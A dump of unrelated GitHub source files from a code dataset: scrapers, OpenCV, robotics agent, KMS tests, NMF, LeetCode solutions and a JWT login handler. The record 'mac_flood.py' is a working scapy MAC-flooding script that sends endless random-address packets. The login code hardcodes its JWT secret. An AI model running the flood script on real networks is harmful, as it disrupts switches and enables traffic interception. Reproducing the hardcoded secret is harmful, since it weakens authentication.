Permitir integracao com pandas\n t.Hide_output = True # Nao imprime no terminal\n twint.run.Search(t) # Executa a busca\n\n tweets_df = twint.storage.panda.Tweets_df\n\n return tweets_df\n\n\ndef get_retweets(hashtag, date_since, date_until):\n\n rt = twint.Config() #Inicializa\n rt.Search = hashtag\n rt.Since = date_since\n rt.Until = date_until\n rt.Native_retweets = True\n rt.Pandas = True #Permitir integracao com pandas\n rt.Hide_output = True #Nao imprime no terminal\n twint.run.Search(rt) #Executa a busca\n\n rt_df = twint.storage.panda.Tweets_df\n\n return rt_df\n\ndef main(argv):\n\n hashtag = ''\n date_since = ''\n date_until = ''\n \n # Check parameters\n try:\n opts, args = getopt.getopt(argv, 'ht:s:u:',['term=','date_since=','date_until='])\n if len(opts) < 3: \n raise getopt.GetoptError('')\n except getopt.GetoptError:\n print('Error or missing argument. 
\\nusage: getData.py -t <term> -s <date_since> -u <date_until>')\n        print('Example: python getData.py -t #brasil -s 2022-01-05 -u 2022-01-10')\n        sys.exit(2)\n    \n    for opt, arg in opts:\n        if opt == '-h':\n            print('Usage: getData.py -t <term> -s <date_since> -u <date_until>')\n            print('Example: python getData.py -t brasil -s 2022-01-05 -u 2022-01-10')\n            sys.exit()\n        if opt in (\"-t\", \"--term\"):\n            hashtag = [arg]\n        if opt in (\"-s\", \"--date_since\"):\n            date_since = arg\n        if opt in (\"-u\", \"--date_until\"):\n            date_until = arg\n    \n    # Creating database\n    conn = conn_db()\n    \n    create_db(conn)\n    \n    # Each search made will receive a date\n    date = datetime.today().strftime('%d-%m-%Y')\n    \n    # Collect data\n    # TODO: ajustar para aceitar lista no parâmetro '-t' na linha de comando.\n    # Por enquanto executando para um termo só\n    for term in hashtag:\n        print('----------------------------')\n        print('Collecting ' + term + \" since \" + date_since) \n        \n        print('Tweets')\n        # Scrapping tweets\n        tweets = get_tweets(term, date_since, date_until)\n        # Inserting in the database\n        insert_db_tweets(conn, tweets, date, term)\n\n        print('Retweets')\n        # Scrapping retweets\n        rt = get_retweets(term, date_since, date_until)\n        # Inserting in the database\n        insert_db_retweets(conn, rt, date, term)\n\n        print('Collection completed: ' + term)\n    \n    conn.close()\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","repo_name":"itsriodejaneiro/pegabot-report","sub_path":"collect/continua/collectingScript.py","file_name":"collectingScript.py","file_ext":"py","file_size_in_byte":7844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41122684769","text":"import cv2\nimport os\nimport numpy as np\n\ntop_left_corner = []\nbottom_right_corner = []\n\nimg = cv2.imread('./content/sea.jpeg', 1)\nimg = cv2.resize(img,(0,0), fx=0.4,fy=0.4)\nimage = img.copy()\ncropped_image = image.copy()\n\ndef cropImage(action, x,y, flags, *userdata):\n    global top_left_corner, bottom_right_corner\n    global cropped_image\n\n    if action == cv2.EVENT_LBUTTONDOWN:\n        top_left_corner.append((x,y))\n    elif action == cv2.EVENT_LBUTTONUP:\n        bottom_right_corner.append((x,y))\n        \n        cropped_image = img[top_left_corner[-1][1] : bottom_right_corner[-1][1], top_left_corner[-1][0] : bottom_right_corner[-1][0]]\n        cv2.imshow(\"Penguin\", img)\n        cv2.imshow(\"Cropped\", cropped_image)\n\ncv2.namedWindow(\"Penguin\")\ncv2.setMouseCallback(\"Penguin\", cropImage)\n\nk = 0\ncount = 0\npath = \"./content/cropped\"\nwhile k!= 113: # 113 <-> q (Press q to exit)\n    cv2.imshow(\"Penguin\", img)\n    k = cv2.waitKey(0)\n    if k == 115: # Press s to save\n        count +=1\n        file_name = \"penguin_cropped_\" + str(count) + \".png\"\n        cv2.imwrite(os.path.join(path, file_name), cropped_image)\n\ncv2.destroyAllWindows()","repo_name":"chungngoc/Getting_started_with_OpenCV","sub_path":"crop_gui_opencv.py","file_name":"crop_gui_opencv.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72531037586","text":"#!/usr/bin/python\n\nimport sys\nimport time\nfrom scapy.all import *\n\niface = \"eth1\"\nif len(sys.argv)>=2:\n    iface = sys.argv[1]\n\nwhile(1):\n    packet = Ether(src=RandMAC(\"*:*:*:*:*:*\"),\n                   dst=RandMAC(\"*:*:*:*:*:*\"))/\\\n             IP(src=RandIP(\"*.*.*.*\"),\n                dst=RandIP(\"*.*.*.*\"))/\\\n             ICMP()\n    time.sleep(0.5)\n    
sendp(packet,iface=iface,loop=0)","repo_name":"hunterzju/python","sub_path":"python/mac_flood.py","file_name":"mac_flood.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16308411381","text":"print(\"Enter number of inputs:\")\nn = int(input())\nphonebook = dict()\nfor i in range(n):\n print(\"Enter data:\")\n line = input()\n line = line.split()\n phonebook[line[0]] = phonebook.get(line[0], line[1])\n\nwhile 1:\n try:\n print(\"Enter name to fetch data:\")\n q = input()\n if q in phonebook:\n print(str(q) + \"=\" + str(phonebook[q]))\n else:\n print(\"Not found\")\n except:\n break","repo_name":"TanayKapoor/Python-Practice","sub_path":"Practice/nameequals.py","file_name":"nameequals.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36868969007","text":"\"\"\"\n矩阵计算\n\"\"\"\nclass Solution:\n def solute(self, n: int):\n C_arr = [0, 0, 1, 1, 1, 0, 1]\n count = 0\n for i in range(1, n + 1):\n for j in range(1, n + 1):\n if C_arr[(i % 7 * j % 7) ** 3 % 7] == 1: # 这样求余防止溢出,\n count += 1\n return count\n\n\n\nif __name__ == \"__main__\":\n n = int(input())\n s = Solution()\n for _ in range(n):\n print(s.solute(int(input())))","repo_name":"Zzhaoo/NJU-2021-LCYOJ","sub_path":"4/4-2.py","file_name":"4-2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39882366113","text":"import os\nimport sys\nimport subprocess\nimport re\nimport numpy as np\nimport dldashboard\n\nif __name__ == \"__main__\":\n # this line has to go before any imports that contain @sio.on functions\n # or else, those @sio.on calls become no-ops\n dldashboard.start()\n\nfrom base_agent.nsp_dialogue_manager import NSPDialogueManager\nfrom locobot.agent.loco_memory import LocoAgentMemory\nfrom base_agent.base_util import to_player_struct, Pos, Look, Player, hash_user\nfrom base_agent.memory_nodes import PlayerNode\nfrom base_agent.loco_mc_agent import LocoMCAgent\nfrom locobot.agent.perception import Perception, SelfPerception\nfrom base_agent.argument_parser import ArgumentParser\nimport locobot.agent.default_behaviors as default_behaviors\nfrom locobot.agent.dialogue_objects import LocoBotCapabilities, LocoGetMemoryHandler, PutMemoryHandler, LocoInterpreter\nimport locobot.agent.rotation as rotation\nfrom locobot.agent.locobot_mover import LoCoBotMover\nfrom multiprocessing import set_start_method\nimport time\nimport signal\nimport random\nimport logging\nimport faulthandler\nfrom dlevent import sio\n\nBASE_AGENT_ROOT = os.path.join(os.path.dirname(__file__), \"../../\")\nSCHEMAS = [os.path.join(os.path.join(BASE_AGENT_ROOT, \"base_agent\"), \"base_memory_schema.sql\")]\n\nfaulthandler.register(signal.SIGUSR1)\n\nrandom.seed(0)\nlog_formatter = logging.Formatter(\n \"%(asctime)s [%(filename)s:%(lineno)s - %(funcName)s() %(levelname)s]: %(message)s\"\n)\nlogging.getLogger().setLevel(logging.DEBUG)\nlogging.getLogger().handlers.clear()\n\n\nclass LocobotAgent(LocoMCAgent):\n \"\"\"Implements an instantiation of the LocoMCAgent on a Locobot. 
It starts\n off the agent processes including launching the dashboard.\n\n Args:\n opts (argparse.Namespace): opts returned by the ArgumentParser with defaults set\n that you can override.\n name (string, optional): a name for your agent (default: Locobot)\n\n Example:\n >>> python locobot_agent.py --backend 'locobot'\n \"\"\"\n\n coordinate_transforms = rotation\n\n def __init__(self, opts, name=\"Locobot\"):\n super(LocobotAgent, self).__init__(opts)\n logging.info(\"LocobotAgent.__init__ started\")\n self.opts = opts\n self.entityId = 0\n self.no_default_behavior = opts.no_default_behavior\n self.last_chat_time = -1000000000000\n self.name = name\n self.player = Player(100, name, Pos(0, 0, 0), Look(0, 0))\n self.pos = Pos(0, 0, 0)\n self.uncaught_error_count = 0\n self.last_task_memid = None\n self.point_targets = []\n self.init_event_handlers()\n # list of (prob, default function) pairs\n self.visible_defaults = [(1.0, default_behaviors.explore)]\n\n def init_event_handlers(self):\n super().init_event_handlers()\n\n @sio.on(\"command\")\n def test_command(sid, commands):\n movement = [0.0, 0.0, 0.0]\n for command in commands:\n if command == \"MOVE_FORWARD\":\n movement[0] += 0.1\n print(\"action: FORWARD\")\n elif command == \"MOVE_BACKWARD\":\n movement[0] -= 0.1\n print(\"action: BACKWARD\")\n elif command == \"MOVE_LEFT\":\n movement[2] += 0.3\n print(\"action: LEFT\")\n elif command == \"MOVE_RIGHT\":\n movement[2] -= 0.3\n print(\"action: RIGHT\")\n elif command == \"PAN_LEFT\":\n self.mover.bot.set_pan(\n self.mover.bot.get_pan() + 0.08\n )\n elif command == \"PAN_RIGHT\":\n self.mover.bot.set_pan(\n self.mover.bot.get_pan() - 0.08\n )\n elif command == \"TILT_UP\":\n self.mover.bot.set_tilt(\n self.mover.bot.get_tilt() - 0.08\n )\n elif command == \"TILT_DOWN\":\n self.mover.bot.set_tilt(\n self.mover.bot.get_tilt() + 0.08\n )\n self.mover.move_relative([movement])\n\n def init_memory(self):\n \"\"\"Instantiates memory for the agent.\n\n Uses the DB_FILE environment variable to write the memory to a\n file or saves it in-memory otherwise.\n \"\"\"\n self.memory = LocoAgentMemory(\n db_file=os.environ.get(\"DB_FILE\", \":memory:\"),\n db_log_path=None,\n )\n logging.info(\"Initialized agent memory\")\n\n def init_perception(self):\n \"\"\"Instantiates all perceptual modules.\n\n Each perceptual module should have a perceive method that is\n called by the base agent event loop.\n \"\"\"\n if not hasattr(self, \"perception_modules\"):\n self.perception_modules = {}\n self.perception_modules[\"self\"] = SelfPerception(self)\n self.perception_modules[\"vision\"] = Perception(self, self.opts.perception_model_dir)\n\n def init_controller(self):\n \"\"\"Instantiates controllers - the components that convert a text chat to task(s).\"\"\"\n dialogue_object_classes = {}\n dialogue_object_classes[\"bot_capabilities\"] = LocoBotCapabilities\n dialogue_object_classes[\"interpreter\"] = LocoInterpreter\n dialogue_object_classes[\"get_memory\"] = LocoGetMemoryHandler\n dialogue_object_classes[\"put_memory\"] = PutMemoryHandler\n self.dialogue_manager = NSPDialogueManager(self, dialogue_object_classes, self.opts)\n\n def init_physical_interfaces(self):\n \"\"\"Instantiates the interface to physically move the robot.\"\"\"\n self.mover = LoCoBotMover(ip=self.opts.ip, backend=self.opts.backend, use_dslam=self.opts.use_dslam)\n\n def get_player_struct_by_name(self, speaker_name):\n p = self.memory.get_player_by_name(speaker_name)\n if p:\n return p.get_struct()\n else:\n return None\n\n def 
get_other_players(self):\n        return [self.player]\n\n    def get_incoming_chats(self):\n        all_chats = []\n        speaker_name = \"dashboard\"\n        if self.dashboard_chat is not None:\n            if not self.memory.get_player_by_name(speaker_name):\n                PlayerNode.create(\n                    self.memory,\n                    to_player_struct((None, None, None), None, None, None, speaker_name),\n                )\n            all_chats.append(self.dashboard_chat)\n            self.dashboard_chat = None\n        return all_chats\n\n    # # FIXME!!!!\n    def send_chat(self, chat: str):\n        logging.info(\"Sending chat: {}\".format(chat))\n        # Send the socket event to show this reply on dashboard\n        sio.emit(\"showAssistantReply\", {'agent_reply' : \"Agent: {}\".format(chat)})\n        self.memory.add_chat(self.memory.self_memid, chat)\n        # actually send the chat, FIXME FOR HACKATHON\n        # return self._cpp_send_chat(chat)\n\n    def step(self):\n        super().step()\n        time.sleep(0)\n\n    def task_step(self, sleep_time=0.0):\n        super().task_step(sleep_time=sleep_time)\n\n\nif __name__ == \"__main__\":\n    base_path = os.path.dirname(__file__)\n    parser = ArgumentParser(\"Locobot\", base_path)\n    opts = parser.parse()\n\n    logging.basicConfig(level=opts.log_level.upper())\n    # set up stdout logging\n    sh = logging.StreamHandler()\n    sh.setFormatter(log_formatter)\n    logging.getLogger().addHandler(sh)\n    logging.info(\"LOG LEVEL: {}\".format(logging.getLogger().level))\n    \n    # Check that models and datasets are up to date\n    if not opts.dev:\n        rc = subprocess.call([opts.verify_hash_script_path, \"locobot\"])\n\n    set_start_method(\"spawn\", force=True)\n\n    sa = LocobotAgent(opts)\n    sa.start()\n","repo_name":"kandluis/droidlet","sub_path":"locobot/agent/locobot_agent.py","file_name":"locobot_agent.py","file_ext":"py","file_size_in_byte":7711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"33751608705","text":"################################################################################\n# Exploratory Data Analysis\n# columns list(sample)\n# sample.drop('is_listened', 1)\n# yes = sample.loc[sample['is_listened'] == 1]\n# no = sample.loc[sample['is_listened'] == 0]\n################################################################################\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom preprocess import preprocess_helper as helper\n# plt.style.use('seaborn-deep')\n\n# read the sample\nsample = helper.preprocess_default('data/train_sample_0.csv')\n\n\ndef age_skip_song():\n    # relationship between age and skip song\n    age_listen = sample[['user_age', 'is_listened']]\n    ages = age_listen['user_age'].unique()\n    ages.sort()\n    table = age_listen.groupby(['user_age', 'is_listened']).size()\n    table = table.sort_index(level='is_listened')\n    result = table.as_matrix()\n\n    plt.bar(ages, result[13:], width=0.5, color='g', align='center')\n    plt.bar(ages+0.5, result[:13], width=0.5, color='r', align='center')\n    plt.legend(('Is Listened', 'Not Listened'), loc='upper right')\n    plt.show()\n\n\ndef times():\n    # At which time the people hear the songs\n    hour = sample[['hour']]\n    hours = hour['hour'].unique()\n    hours.sort()\n    table = hour.groupby(['hour']).size()\n    table = table.sort_index(level='hour')\n    result = table.as_matrix()\n\n    plt.bar(hours, result, width=0.5, color='g', align='center')\n    plt.legend(\"People hearing music\", loc='upper right')\n    plt.xlim(0, 24)\n    plt.show()\n\n#---\n\ndef histogram(sample, column_name):\n    \"\"\"Create a histogram\"\"\"\n    column = sample[[column_name]]\n    values = column[column_name].unique()\n    values.sort()\n    
#print(values)\n table = column.groupby([column_name]).size()\n table = table.sort_index(level=column_name)\n #print(table)\n result = table.as_matrix()\n\n plt.bar(values, result, width=0.5, color='g', align='center')\n plt.legend(\"Title\", loc='upper right')\n # plt.xlim(values[0], values[-1])\n plt.show()\n\n\n\ndef draw_platform_family_by_age(id, title):\n \"\"\"draws how many users listened or not a track in a certain \n platform_family by age\"\"\"\n sub_sample = sample[['platform_family','user_age','is_listened']]\n sub_sample = sub_sample[(sub_sample.platform_family == id)]\n\n ages = sub_sample['user_age'].unique()\n ages.sort()\n\n table = sub_sample.groupby(['platform_family','user_age', 'is_listened']).size()\n table = table.sort_index(level='is_listened')\n table_matrix = table.as_matrix()\n\n plt.title(title)\n\n # bug: when the number of ages is not exactly 13, but with all the data set, less probable.\n\n plt.bar(ages, table_matrix[13:], width=0.5, color='g', align='center')\n plt.bar(ages+0.5, table_matrix[:13], width=0.5, color='r', align='center')\n\n plt.legend(('Is Listened', 'Not Listened'), loc='upper right')\n plt.ylabel(\"Quantity\");\n plt.xlabel(\"Ages\");\n\n plt.show()\n\n\n# histogram(sample, 'release_year')\n# times()\n# age_skip_song()\n\n# for platform_family 0\ndraw_platform_family_by_age(0, \"Platform Family 0\")\n# for platform_family 1\ndraw_platform_family_by_age(1, \"Platform Family 1\")\n# for platform_family 2\ndraw_platform_family_by_age(2, \"Platform Family 2\")\n\n","repo_name":"omartrinidad/challenge","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32306597271","text":"import pytest\n\nfrom moto.kms.exceptions import (\n AccessDeniedException,\n InvalidCiphertextException,\n NotFoundException,\n ValidationException,\n)\nfrom moto.kms.models import Key\nfrom moto.kms.utils import (\n _deserialize_ciphertext_blob,\n _serialize_ciphertext_blob,\n _serialize_encryption_context,\n generate_data_key,\n generate_master_key,\n MASTER_KEY_LEN,\n encrypt,\n decrypt,\n Ciphertext,\n KeySpec,\n SigningAlgorithm,\n RSAPrivateKey,\n ECDSAPrivateKey,\n)\n\nENCRYPTION_CONTEXT_VECTORS = [\n (\n {\"this\": \"is\", \"an\": \"encryption\", \"context\": \"example\"},\n b\"an\" b\"encryption\" b\"context\" b\"example\" b\"this\" b\"is\",\n ),\n (\n {\"a_this\": \"one\", \"b_is\": \"actually\", \"c_in\": \"order\"},\n b\"a_this\" b\"one\" b\"b_is\" b\"actually\" b\"c_in\" b\"order\",\n ),\n]\nCIPHERTEXT_BLOB_VECTORS = [\n (\n Ciphertext(\n key_id=\"d25652e4-d2d2-49f7-929a-671ccda580c6\",\n iv=b\"123456789012\",\n ciphertext=b\"some ciphertext\",\n tag=b\"1234567890123456\",\n ),\n b\"d25652e4-d2d2-49f7-929a-671ccda580c6\"\n b\"123456789012\"\n b\"1234567890123456\"\n b\"some ciphertext\",\n ),\n (\n Ciphertext(\n key_id=\"d25652e4-d2d2-49f7-929a-671ccda580c6\",\n iv=b\"123456789012\",\n ciphertext=b\"some ciphertext that is much longer now\",\n tag=b\"1234567890123456\",\n ),\n b\"d25652e4-d2d2-49f7-929a-671ccda580c6\"\n b\"123456789012\"\n b\"1234567890123456\"\n b\"some ciphertext that is much longer now\",\n ),\n]\n\n\ndef test_KeySpec_Enum():\n assert KeySpec.rsa_key_specs() == sorted(\n [KeySpec.RSA_2048, KeySpec.RSA_3072, KeySpec.RSA_4096]\n )\n assert KeySpec.ecc_key_specs() == sorted(\n [\n KeySpec.ECC_NIST_P256,\n KeySpec.ECC_SECG_P256K1,\n KeySpec.ECC_NIST_P384,\n KeySpec.ECC_NIST_P521,\n ]\n )\n assert 
KeySpec.hmac_key_specs() == sorted(\n [KeySpec.HMAC_224, KeySpec.HMAC_256, KeySpec.HMAC_284, KeySpec.HMAC_512]\n )\n\n\ndef test_SigningAlgorithm_Enum():\n assert SigningAlgorithm.rsa_signing_algorithms() == sorted(\n [\n SigningAlgorithm.RSASSA_PSS_SHA_256,\n SigningAlgorithm.RSASSA_PSS_SHA_384,\n SigningAlgorithm.RSASSA_PSS_SHA_512,\n SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_256,\n SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_384,\n SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_512,\n ]\n )\n assert SigningAlgorithm.ecc_signing_algorithms() == sorted(\n [\n SigningAlgorithm.ECDSA_SHA_256,\n SigningAlgorithm.ECDSA_SHA_384,\n SigningAlgorithm.ECDSA_SHA_512,\n ]\n )\n\n\ndef test_RSAPrivateKey_invalid_key_size():\n with pytest.raises(ValidationException) as ex:\n _ = RSAPrivateKey(key_size=100)\n assert (\n ex.value.message\n == \"1 validation error detected: Value at 'key_size' failed to satisfy constraint: Member must satisfy enum value set: [2048, 3072, 4096]\"\n )\n\n\ndef test_ECDSAPrivateKey_invalid_key_spec():\n with pytest.raises(ValidationException) as ex:\n _ = ECDSAPrivateKey(key_spec=\"InvalidKeySpec\")\n assert (\n ex.value.message\n == \"1 validation error detected: Value at 'key_spec' failed to satisfy constraint: Member must satisfy enum value set: ['ECC_NIST_P256', 'ECC_NIST_P384', 'ECC_NIST_P521', 'ECC_SECG_P256K1']\"\n )\n\n\ndef test_generate_data_key():\n test = generate_data_key(123)\n\n assert isinstance(test, bytes)\n assert len(test) == 123\n\n\ndef test_generate_master_key():\n test = generate_master_key()\n\n assert isinstance(test, bytes)\n assert len(test) == MASTER_KEY_LEN\n\n\n@pytest.mark.parametrize(\"raw,serialized\", ENCRYPTION_CONTEXT_VECTORS)\ndef test_serialize_encryption_context(raw, serialized):\n test = _serialize_encryption_context(raw)\n assert test == serialized\n\n\n@pytest.mark.parametrize(\"raw,_serialized\", CIPHERTEXT_BLOB_VECTORS)\ndef test_cycle_ciphertext_blob(raw, _serialized):\n test_serialized = _serialize_ciphertext_blob(raw)\n test_deserialized = _deserialize_ciphertext_blob(test_serialized)\n assert test_deserialized == raw\n\n\n@pytest.mark.parametrize(\"raw,serialized\", CIPHERTEXT_BLOB_VECTORS)\ndef test_serialize_ciphertext_blob(raw, serialized):\n test = _serialize_ciphertext_blob(raw)\n assert test == serialized\n\n\n@pytest.mark.parametrize(\"raw,serialized\", CIPHERTEXT_BLOB_VECTORS)\ndef test_deserialize_ciphertext_blob(raw, serialized):\n test = _deserialize_ciphertext_blob(serialized)\n assert test == raw\n\n\n@pytest.mark.parametrize(\n \"encryption_context\", [ec[0] for ec in ENCRYPTION_CONTEXT_VECTORS]\n)\ndef test_encrypt_decrypt_cycle(encryption_context):\n plaintext = b\"some secret plaintext\"\n master_key = Key(\"nop\", \"nop\", \"nop\", \"nop\", \"nop\", \"nop\")\n master_key_map = {master_key.id: master_key}\n\n ciphertext_blob = encrypt(\n master_keys=master_key_map,\n key_id=master_key.id,\n plaintext=plaintext,\n encryption_context=encryption_context,\n )\n assert ciphertext_blob != plaintext\n\n decrypted, decrypting_key_id = decrypt(\n master_keys=master_key_map,\n ciphertext_blob=ciphertext_blob,\n encryption_context=encryption_context,\n )\n assert decrypted == plaintext\n assert decrypting_key_id == master_key.id\n\n\ndef test_encrypt_unknown_key_id():\n with pytest.raises(NotFoundException):\n encrypt(\n master_keys={},\n key_id=\"anything\",\n plaintext=b\"secrets\",\n encryption_context={},\n )\n\n\ndef test_decrypt_invalid_ciphertext_format():\n master_key = Key(\"nop\", \"nop\", \"nop\", \"nop\", \"nop\", 
\"nop\")\n master_key_map = {master_key.id: master_key}\n\n with pytest.raises(InvalidCiphertextException):\n decrypt(master_keys=master_key_map, ciphertext_blob=b\"\", encryption_context={})\n\n\ndef test_decrypt_unknwown_key_id():\n ciphertext_blob = (\n b\"d25652e4-d2d2-49f7-929a-671ccda580c6\"\n b\"123456789012\"\n b\"1234567890123456\"\n b\"some ciphertext\"\n )\n\n with pytest.raises(AccessDeniedException):\n decrypt(master_keys={}, ciphertext_blob=ciphertext_blob, encryption_context={})\n\n\ndef test_decrypt_invalid_ciphertext():\n master_key = Key(\"nop\", \"nop\", \"nop\", \"nop\", \"nop\", \"nop\")\n master_key_map = {master_key.id: master_key}\n ciphertext_blob = (\n master_key.id.encode(\"utf-8\") + b\"123456789012\"\n b\"1234567890123456\"\n b\"some ciphertext\"\n )\n\n with pytest.raises(InvalidCiphertextException):\n decrypt(\n master_keys=master_key_map,\n ciphertext_blob=ciphertext_blob,\n encryption_context={},\n )\n\n\ndef test_decrypt_invalid_encryption_context():\n plaintext = b\"some secret plaintext\"\n master_key = Key(\"nop\", \"nop\", \"nop\", \"nop\", \"nop\", \"nop\")\n master_key_map = {master_key.id: master_key}\n\n ciphertext_blob = encrypt(\n master_keys=master_key_map,\n key_id=master_key.id,\n plaintext=plaintext,\n encryption_context={\"some\": \"encryption\", \"context\": \"here\"},\n )\n\n with pytest.raises(InvalidCiphertextException):\n decrypt(\n master_keys=master_key_map,\n ciphertext_blob=ciphertext_blob,\n encryption_context={},\n )\n","repo_name":"getmoto/moto","sub_path":"tests/test_kms/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":7366,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"4067967110","text":"# +\nimport torch, time\nimport numpy as np\nimport joblib\nimport logging as log\nfrom sklearn.decomposition import NMF\nfrom sklearn.utils import check_random_state\n\n\n\nclass NMFclass:\n def __init__(self, config):\n self.config = config\n\n \n def initialise_WH(self, X, n_components, random_state, H_init=None): \n \n avg = np.sqrt(X.mean() / n_components)\n rng = check_random_state(random_state)\n\n W_init = avg * rng.standard_normal(size=(X.shape[0], n_components)).astype('double', copy=False)\n W_init = np.abs(W_init)\n \n return W_init, H_init \n\n \n def p_onmf(self, X, rank, H_init=None, W_init=None, iterations=200, alpha=1.0):\n \n \n m, n = X.shape\n W = torch.rand(m, rank).to(self.config['cuda']) if isinstance(W_init, type(None)) else W_init\n H = torch.rand(rank, n).to(self.config['cuda']) if isinstance(H_init, type(None)) else H_init\n \n for itr in range(iterations):\n \n enum = torch.mm(X, torch.transpose(H, 0, 1))\n denom = torch.mm(W, torch.mm(H, torch.transpose(H, 0, 1)))\n W = torch.nan_to_num(torch.mul(W, torch.div(enum, denom)))\n \n HHTH = torch.mm(torch.mm(H, torch.transpose(H, 0, 1)), H)\n enum = torch.mm(torch.transpose(W, 0, 1), X) + torch.mul(H, alpha)\n denom = torch.mm(torch.mm(torch.transpose(W, 0, 1), W), H) + torch.mul(HHTH, 2.0 * alpha)\n H = torch.nan_to_num(torch.mul(H, torch.div(enum, denom)))\n \n W.to('cpu') \n H.to('cpu') \n \n return W, H\n \n \n\n def run(self, X, rank, H_init=None, W_init=None):\n \n X = X.to(self.config['cuda'])\n W, H = self.p_onmf(X, rank, H_init)\n\n X.to('cpu')\n del X\n return W, 
H\n","repo_name":"simra-shahid/hyhtm","sub_path":"codebase/nmf.py","file_name":"nmf.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15656694175","text":"class Solution:\n\n def __init__(self, w: List[int]):\n self.acc_weight = []\n self.total_weight = 0\n for weight in w:\n self.total_weight += weight\n self.acc_weight.append(self.total_weight)\n\n def pickIndex(self) -> int:\n target = self.total_weight * random.random()\n low, high = 0, len(self.acc_weight)\n while low < high:\n mid = low + (high - low)//2\n if self.acc_weight[mid] <= target:\n low = mid + 1\n else:\n high = mid\n return low\n \n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(w)\n# param_1 = obj.pickIndex()\n","repo_name":"doria112/SANDBOX","sub_path":"doria112/lc/528_Random_Pick_with_Weight_v2.py","file_name":"528_Random_Pick_with_Weight_v2.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1367858030","text":"#\n# @lc app=leetcode id=1292 lang=python3\n#\n# [1292] Maximum Side Length of a Square with Sum Less than or Equal to Threshold\n#\n\n# @lc code=start\nclass Solution:\n def maxSideLength(self, mat: List[List[int]], threshold: int) -> int:\n m, n = len(mat), len(mat[0])\n dp = [[0 for _ in range(n + 1)] for _ in range(m + 1)]\n best = 0\n for i in range(1, m + 1) :\n for j in range(1, n + 1) :\n dp[i][j] = mat[i - 1][j - 1] + dp[i][j - 1] + dp[i - 1][j] - dp[i - 1][j - 1]\n l, r = 1, min(i, j)\n while l <= r :\n k = (l + r) // 2\n _sum = dp[i][j] - dp[i - k][j] - dp[i][j - k] + dp[i - k][j - k]\n if _sum <= threshold:\n best = max(best, k)\n l = k + 1\n else:\n r = k - 1\n return best \n# @lc code=end\n\n","repo_name":"quixoteji/Leetcode","sub_path":"solutions/1292.maximum-side-length-of-a-square-with-sum-less-than-or-equal-to-threshold.py","file_name":"1292.maximum-side-length-of-a-square-with-sum-less-than-or-equal-to-threshold.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19519459005","text":"import json\nimport hashlib\nfrom db.DataDB import select_table\nfrom global_data import online_clients\nfrom user_chat import retrieve_messages\nimport jwt\nimport datetime\nimport rsa\nfrom tool_fuction import load_keys\n\nsecret_key = \"FluppyFR_Asuna\" # 服务器的密钥\n\n\ndef get_token(user_id, user_pwd):\n payload = {\n \"user_id\": user_id,\n \"user_pwd\": user_pwd,\n \"exp\": datetime.datetime.utcnow() + datetime.timedelta(minutes=3) # 令牌有效期\n }\n # secret_key = \"FluppyFR_Asuna\" # 服务器的密钥\n token = jwt.encode(payload, secret_key, algorithm=\"HS256\")\n return token\n\n\ndef verify_token(request_token, secret_key):\n try:\n decoded_payload = jwt.decode(request_token, secret_key, algorithms=[\"HS256\"])\n return decoded_payload\n except jwt.ExpiredSignatureError:\n # 令牌已过期\n return None\n except jwt.DecodeError:\n # 令牌验证失败\n return None\n\n\n# 在请求中提取令牌并验证\n\n\ndef user_login(data, socket, address, con):\n content = data[\"content\"]\n request_token = content[\"token\"]\n if request_token is not None:\n decoded_payload = verify_token(request_token, secret_key)\n if decoded_payload:\n user_id = decoded_payload[\"user_id\"]\n print(f\"user_id is {user_id}\")\n res = select_table(con, \"user\", user_id=int(user_id))\n user_pwd = decoded_payload[\"user_pwd\"]\n 
print(f\"Authenticated user: {user_pwd} (ID: {user_id})\")\n token_login = True\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0003\",\n 'content': {\n 'user_name': res[0][1],\n 'user_id': user_id\n }\n }\n online_clients[int(user_id)] = (socket, address)\n else:\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0005\",\n 'content': None\n }\n\n print(\"Token is invalid or expired.\")\n token_login = False\n else:\n res = select_table(con, \"user\", user_id=int(content[\"user_id\"])) # id为int型\n if len(res) == 0: # 未注册,返回空列表\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0002\",\n 'content': None\n }\n result = \"该用户未注册\"\n else:\n user_pwd = content[\"user_pwd\"]\n # hashed_user_pwd = hashlib.sha256(user_pwd.encode('utf-8')).hexdigest()\n # 用哈希加密就不能找回密码了,改成RSA加密\n pubkey, privkey = load_keys()\n # rsa生成的密文有随机性,解密了再比较\n res_pwd = rsa.decrypt(res[0][2], privkey).decode()\n # print(res[0][2])\n # print(hashed_user_pwd)\n # print(res[0][2])\n # 